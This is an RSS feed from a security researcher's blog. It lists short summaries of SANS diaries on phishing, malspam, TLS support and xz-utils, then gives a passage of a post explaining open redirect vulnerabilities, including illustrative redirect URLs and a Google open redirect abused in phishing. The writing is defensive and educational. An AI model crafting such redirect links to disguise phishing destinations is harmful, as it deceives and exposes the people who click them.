        <guid>https://untrustednetwork.net/en/2025/03/03/10-years/</guid>
        <description>Today marks the 10-year anniversary of this website. It has changed a lot since 2015 (take a look at the Internet Archive, if you’re interested in its humble beginnings), and not just visually, but also in terms of content – at this point, it holds a total 153 posts in English, and 362 posts in Czech.
In any case, since I thought it would be worthwhile to share something interesting for the anniversary, I decided to offer you some high-level AWStats data that encompasses the entire lifetime of this website…</description>
        <content:encoded>&lt;p&gt;Today marks the 10-year anniversary of this website. It has changed a lot since 2015 (take a look at the &lt;a href=&#34;https://web.archive.org/web/20150714074754/http://www.untrustednetwork.net/&#34;&gt;Internet Archive&lt;/a&gt;, if you’re interested in its humble beginnings), and not just visually, but also in terms of content – at this point, it holds a total 153 posts in English, and 362 posts in Czech.&lt;/p&gt;
&lt;p&gt;In any case, since I thought it would be worthwhile to share something interesting for the anniversary, I decided to offer you some high-level AWStats data that encompasses the entire lifetime of this website…&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/2025/02-10-years/statistics.png&#34; alt=&#34;AWStats data for 2015-2025&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.net/images/2025/02-10-years/statistics.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
        
          
            
              <category>News</category>
            
          
            
              <category>2025</category>
            
          
        
        
      </item>
      
      <item>
        <title>SSL 2.0 support on servers in the Czech Republic</title>
        <link>https://untrustednetwork.net/en/2025/02/10/ssl20-cz/</link>
        <pubDate>Mon, 10 Feb 2025 07:55:00 +0100</pubDate>
        
        <atom:modified>Mon, 10 Feb 2025 07:55:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2025/02/10/ssl20-cz/</guid>
        <description>While I was writing last week&amp;rsquo;s article, which was devoted to the number of internet-exposed servers that still support SSL 2.0, it occured to me that it might be interesting to take a look at how support for this protocol has decreased in the Czech Republic over the years&amp;hellip; So, you will find the answer in the following chart.</description>
        <content:encoded>&lt;p&gt;While I was writing &lt;a href=&#34;https://untrustednetwork.net/en/2025/02/07/ssl2-30-years/&#34;&gt;last week&amp;rsquo;s article&lt;/a&gt;, which was devoted to the number of internet-exposed servers that still support SSL 2.0, it occured to me that it might be interesting to take a look at how support for this protocol has decreased in the Czech Republic over the years&amp;hellip; So, you will find the answer in the following chart.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/2025/01-ssl2-cz/ssl2-cze.jpg&#34; alt=&#34;Podpora SSL 2.0 v prostředí ČR&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.net/images/2025/01-ssl2-cz/ssl2-cze.jpg" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SSL</category>
            
          
            
              <category>Czech Republic</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2025</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - SSL 2.0 turns 30 this Sunday... Perhaps the time has come to let it die?</title>
        <link>https://untrustednetwork.net/en/2025/02/07/ssl2-30-years/</link>
        <pubDate>Fri, 07 Feb 2025 11:45:00 +0100</pubDate>
        
        <atom:modified>Fri, 07 Feb 2025 11:45:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2025/02/07/ssl2-30-years/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at an upcoming 30-year anniversary of the publication of SSL 2.0, and on the number of internet-exposed systems that still support this protocol&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/31664&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at an upcoming 30-year anniversary of the publication of SSL 2.0, and on the number of internet-exposed systems that still support this protocol&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>SSL</category>
            
          
            
              <category>TLS</category>
            
          
            
              <category>HTTPS</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2025</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - An unusual &#39;shy z-wasp&#39; phishing</title>
        <link>https://untrustednetwork.net/en/2025/01/27/shy-z-wasp/</link>
        <pubDate>Mon, 27 Jan 2025 12:20:00 +0100</pubDate>
        
        <atom:modified>Mon, 27 Jan 2025 12:20:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2025/01/27/shy-z-wasp/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at an unusual phishing message, in which two different techniques for splitting text using unrendered characters were used with the intention of bypassing security scans&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/31626&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at an unusual phishing message, in which two different techniques for splitting text using unrendered characters were used with the intention of bypassing security scans&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>Z-WASP</category>
            
          
            
              <category>HTML</category>
            
          
            
              <category>Outlook</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2025</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Changes in SSL and TLS support in 2024</title>
        <link>https://untrustednetwork.net/en/2024/12/30/ssl-tls-2024/</link>
        <pubDate>Mon, 30 Dec 2024 12:25:00 +0100</pubDate>
        
        <atom:modified>Mon, 30 Dec 2024 12:25:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2024/12/30/ssl-tls-2024/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at changes in SSL/TLS support on web servers and e-mail servers during the 12 months of 2024&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/31550&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at changes in SSL/TLS support on web servers and e-mail servers during the 12 months of 2024&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>SSL</category>
            
          
            
              <category>TLS</category>
            
          
            
              <category>HTTPS</category>
            
          
            
              <category>SMTP</category>
            
          
            
              <category>E-mail</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2024</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - The strange case of disappearing Russian servers</title>
        <link>https://untrustednetwork.net/en/2024/11/25/russian-servers/</link>
        <pubDate>Mon, 25 Nov 2024 08:14:15 +0100</pubDate>
        
        <atom:modified>Mon, 25 Nov 2024 08:14:15 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2024/11/25/russian-servers/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a recent significant decrease in the number of servers seen by Shodan in Russia&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/31476&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a recent significant decrease in the number of servers seen by Shodan in Russia&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Russia</category>
            
          
            
              <category>Shodan</category>
            
          
            
              <category>CWMP</category>
            
          
            
              <category>TR-069</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2024</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Self-contained HTML phishing attachment using Telegram to exfiltrate stolen credentials</title>
        <link>https://untrustednetwork.net/en/2024/10/28/telegram-phishing/</link>
        <pubDate>Mon, 28 Oct 2024 08:15:00 +0100</pubDate>
        
        <atom:modified>Mon, 28 Oct 2024 08:15:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2024/10/28/telegram-phishing/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at an HTML phishing attachment which used Telegram to send stolen credentials back to its authors&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/31388&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at an HTML phishing attachment which used Telegram to send stolen credentials back to its authors&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>Telegram</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2024</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Phishing links with @ sign and the need for effective security awareness building</title>
        <link>https://untrustednetwork.net/en/2024/09/23/at-phishing/</link>
        <pubDate>Mon, 23 Sep 2024 08:55:00 +0100</pubDate>
        
        <atom:modified>Mon, 23 Sep 2024 08:55:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2024/09/23/at-phishing/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at misuse of the user information string in a URL, and at the topic of effective security awareness building in relation to phishing&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/31288&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at misuse of the user information string in a URL, and at the topic of effective security awareness building in relation to phishing&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2024</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Script obfuscation using multiple instances of the same function</title>
        <link>https://untrustednetwork.net/en/2024/08/05/script-obfuscation/</link>
        <pubDate>Mon, 05 Aug 2024 08:15:00 +0100</pubDate>
        
        <atom:modified>Mon, 05 Aug 2024 08:15:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2024/08/05/script-obfuscation/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at an interesting script obfuscation technique&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/31144&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at an interesting script obfuscation technique&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Malware</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2024</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - &#39;Reply-chain phishing&#39; with a twist</title>
        <link>https://untrustednetwork.net/en/2024/07/16/reply-chain-phishing/</link>
        <pubDate>Tue, 16 Jul 2024 11:30:00 +0100</pubDate>
        
        <atom:modified>Tue, 16 Jul 2024 11:30:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2024/07/16/reply-chain-phishing/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a slightly unusual &amp;ldquo;reply-chain&amp;rdquo; phishing technique&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/31084&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a slightly unusual &amp;ldquo;reply-chain&amp;rdquo; phishing technique&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2024</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Support of SSL 2.0 on web servers in 2024</title>
        <link>https://untrustednetwork.net/en/2024/06/28/sslv2/</link>
        <pubDate>Fri, 28 Jun 2024 12:00:00 +0100</pubDate>
        
        <atom:modified>Fri, 28 Jun 2024 12:00:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2024/06/28/sslv2/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at the number of web server that still support SSL v2.0&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/31044&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at the number of web server that still support SSL v2.0&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>SSL</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2024</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Files with TXZ extension used as malspam attachments</title>
        <link>https://untrustednetwork.net/en/2024/05/27/txz-malspam/</link>
        <pubDate>Mon, 27 May 2024 08:45:00 +0100</pubDate>
        
        <atom:modified>Mon, 27 May 2024 08:45:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2024/05/27/txz-malspam/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at recent malspam campaigns distributing files with the TXZ extension&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/30958&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at recent malspam campaigns distributing files with the TXZ extension&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>TZX</category>
            
          
            
              <category>xz-utils</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>GuLoader</category>
            
          
            
              <category>Formbook</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2024</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - It appears that the number of industrial devices accessible from the internet has risen by 30 thousand over the past three years</title>
        <link>https://untrustednetwork.net/en/2024/04/22/ics-internet/</link>
        <pubDate>Mon, 22 Apr 2024 12:25:00 +0100</pubDate>
        
        <atom:modified>Mon, 22 Apr 2024 12:25:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2024/04/22/ics-internet/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at the number of internet-exposed industrial control systems&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/30860&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at the number of internet-exposed industrial control systems&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>ICS</category>
            
          
            
              <category>BACnet</category>
            
          
            
              <category>Modbus</category>
            
          
            
              <category>Shodan</category>
            
          
            
              <category>Censys</category>
            
          
            
              <category>Shadowserver</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2024</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - The xz-utils backdoor in security advisories by national CSIRTs</title>
        <link>https://untrustednetwork.net/en/2024/04/01/xz-utils/</link>
        <pubDate>Mon, 01 Apr 2024 13:55:00 +0100</pubDate>
        
        <atom:modified>Mon, 01 Apr 2024 13:55:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2024/04/01/xz-utils/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at the number of security advisories published by national and governmental CSIRTs in connection with the backdoor in xz-utils&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/30800&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at the number of security advisories published by national and governmental CSIRTs in connection with the backdoor in xz-utils&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>xz-utils</category>
            
          
            
              <category>Vulnerability</category>
            
          
            
              <category>Backdoor</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2024</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Increase in the number of phishing messages pointing to IPFS and to R2 buckets</title>
        <link>https://untrustednetwork.net/en/2024/03/14/ipfs-r2-phishing/</link>
        <pubDate>Thu, 14 Mar 2024 09:55:00 +0100</pubDate>
        
        <atom:modified>Thu, 14 Mar 2024 09:55:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2024/03/14/ipfs-r2-phishing/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a recent rise in the number of phishing messages pointing to IPFS and R2 buckets&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/30744&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a recent rise in the number of phishing messages pointing to IPFS and R2 buckets&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>IPFS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>Cloudflare</category>
            
          
            
              <category>R2</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2024</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>Actively exploited open redirect in Google Web Light</title>
        <link>https://untrustednetwork.net/en/2024/02/26/google-open-redirect/</link>
        <pubDate>Mon, 26 Feb 2024 06:30:00 +0100</pubDate>
        
        <atom:modified>Mon, 26 Feb 2024 06:30:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2024/02/26/google-open-redirect/</guid>
        <description>TL;DR: An open redirect vulnerability exists in the remains of Google Web Light service, which is being actively exploited in multiple phishing campaigns. Google decided not to fix it, so it might be advisable to block access to the Web Light domain in corporate environments…
If you are already aware of the principles behind “open redirect” vulnerabilities and want jump straight to the discussion of the Web Light vulnerability and its active exploitation, click here.</description>
        <content:encoded>&lt;p&gt;&lt;i&gt;TL;DR: An open redirect vulnerability exists in the remains of Google Web Light service, which is being actively exploited in multiple phishing campaigns. Google decided not to fix it, so it might be advisable to block access to the Web Light domain in corporate environments…&lt;/i&gt;&lt;/p&gt;
&lt;p&gt;If you are already aware of the principles behind “open redirect” vulnerabilities and want jump straight to the discussion of the Web Light vulnerability and its active exploitation, click &lt;a href=&#34;#vulnerability&#34;&gt;here&lt;/a&gt;. If you are not, let’s first set the stage by discussing what open redirects are and how they may be used by threat actors…&lt;/p&gt;
&lt;p&gt;Open redirect – or &lt;a href=&#34;https://cwe.mitre.org/data/definitions/601.html&#34;&gt;CWE-601&lt;/a&gt; – is a type of software vulnerability, which affects web applications that redirect its visitors to URLs, that are dynamically created based on user-controlled input, if these applications don&amp;rsquo;t sufficiently validate whether these URLs are “trusted”. In basic terms, any such vulnerability allows for creation of links, which point to a vulnerable application and which cause it to automatically redirect the browser of a visitor to another (usually any specified) URL.&lt;/p&gt;
&lt;p&gt;If the potential impact of such a vulnerability isn’t clear to you, imagine if a web application of a well-known bank running at “www.mybank.tld” redirected visitors to the domain “login.mybank.tld” using a dynamic redirection mechanism, which would accept the target URL through a “redirect_to” parameter. A URL used for this redirection might look like this.&lt;/p&gt;
&lt;p&gt;&lt;kbd&gt;ht&lt;span&gt;tps://www.my&lt;/span&gt;mybank.tld/?redirect_to=ht&lt;span&gt;tps://login.my&lt;/span&gt;bank.tld&lt;/p&gt;
&lt;p&gt;You might wonder why someone would use the above-mentioned “dynamic” approach to redirection instead of using static links. The truth is that there may be certain benefits to doing so this way – probably the most important one being the ability to precisely track “clickthroughs” to different destinations (e.g., for marketing purposes).&lt;/p&gt;
&lt;p&gt;In any case, if the redirection mechanism in our example allowed only for limited redirection to URLs within the second-level domain mybank.tld, it would most likely be quite alright from a security standpoint. However, if the mechanism lacked any sort of validation of the target URL, one could easily create a link, which would point to the trusted site of the bank, but which would result in a redirection to an untrusted (and potentially malicious) site… For example a literal “untrusted” site:&lt;/p&gt;
&lt;p&gt;&lt;kbd&gt;ht&lt;span&gt;tps://www.my&lt;/span&gt;mybank.tld/?redirect_to=ht&lt;span&gt;tps://untrustednetwork&lt;/span&gt;.net&lt;/p&gt;
&lt;p&gt;You can probably see the issue – in such a case, any threat actor out there could create a link pointing to the legitimate website of the bank, which would – when opened – result in redirection to a malicious site of their choosing. This could be quite useful for phishing attacks. Since most people only check the beginning of a URL before opening it, if they saw that a link in an e-mail points to a valid domain of the bank, they might be much more willing to click it than if it pointed to a different/unknown domain. And, in fact, threat actors do actively exploit these vulnerabilities in just this way - by redirecting unsuspecting victims to phishing sites through legitimate domains…&lt;/p&gt;
&lt;p&gt;As we can see, although open redirects are hardly the most dangerous type of vulnerabilities in existence, they do sometimes pose a not insignificant risk – especially if the affected application is hosted on a well-known and well-trusted domain. This viewpoint is well-supported by the fact that “Unvalidated Redirects and Forwards” were actually included in the &lt;a href=&#34;https://owasp.org/www-pdf-archive/OWASP_Top_10_-_2010.pdf&#34;&gt;2010 version of OWASP Top 10&lt;/a&gt; (i.e., they were considered by the security community at large to be one of the 10 most significant risks related to web applications at that time).&lt;/p&gt;
&lt;p&gt;Nevertheless, since successful exploitation of these vulnerabilities is dependent on social engineering, and their impact is limited, many organizations consider them either very low risk, or non-issues. For some organizations and some domains, this may be understandable, while for others not so much…&lt;/p&gt;
&lt;p&gt;One organization, which &lt;a href=&#34;https://bughunters.google.com/learn/invalid-reports/web-platform/navigation/6680364896223232/open-redirectors&#34;&gt;takes the overall viewpoint&lt;/a&gt; that “a small number of properly monitored redirectors offers fairly clear benefits and poses very little practical risk” is Google.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/2024/03-google-phishing/google-open-redirectors.png&#34; alt=&#34;Google&#39;s take on open redirectors&#34; style=&#34;max-width:800px;width:100%;border:1px solid grey&#34;&gt;
&lt;div align=right&gt;&lt;kbd&gt;Source: &lt;a href=&#34;https://bughunters.google.com/learn/invalid-reports/web-platform/navigation/6680364896223232/open-redirectors&#34;&gt;Google&lt;/a&gt;&lt;/kbd&gt;&lt;/div&gt;
&lt;br&gt;
&lt;p&gt;While I personally disagree with the “very little practical risk” part (especially in connection with any domain owned by Google) I completely understand the “clear benefits” portion of the sentence… Though it should be stressed that the “benefits” are not to users of Google services, but to Google itself, since – as we already mentioned – redirection mechanisms are quite useful for marketing-related tracking.&lt;/p&gt;
&lt;p&gt;Although I don&amp;rsquo;t want to appear petty, it is also worth noting that my views on risks connected with open redirects on Google’s domains are shared by its own AI…&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/2024/03-google-phishing/gemini-open-redirect.png&#34; alt=&#34;Google Gemini take on open redirect vulnerabilities&#34; style=&#34;max-width:800px;width:100%;border:1px solid grey&#34;&gt;
&lt;div align=right&gt;&lt;kbd&gt;Source: Google Gemini&lt;/kbd&gt;&lt;/div&gt;
&lt;br&gt;
&lt;p&gt;That is beside the point, however.&lt;/p&gt;
&lt;p&gt;What is important is that even though Google sees “very little practical risk” in open redirection, it has implemented sufficient security measures for most of its services where open redirection is actually used. I.e., some Google services do allow for redirection to arbitrary URLs, however, if these services are linked to from an external source (e.g., an e-mail or a third-party site), then the user is first asked if the redirection should take place. You can see how this looks by opening either of the following links.&lt;/p&gt;
&lt;p&gt;&lt;kbd&gt;&lt;a href=&#34;https://www.google.com/url?sa=t&amp;amp;url=https://untrustednetwork.net&#34;&gt;https://www.google.com/url?sa=t&amp;amp;url=https://untrustednetwork.net&lt;/a&gt;&lt;br /&gt;
&lt;kbd&gt;&lt;a href=&#34;https://www.youtube.com/redirect?q=https%3A%2F%2Fwww.untrustednetwork.net&#34;&gt;https://www.youtube.com/redirect?q=https%3A%2F%2Fwww.untrustednetwork.net&lt;/a&gt;&lt;/p&gt;
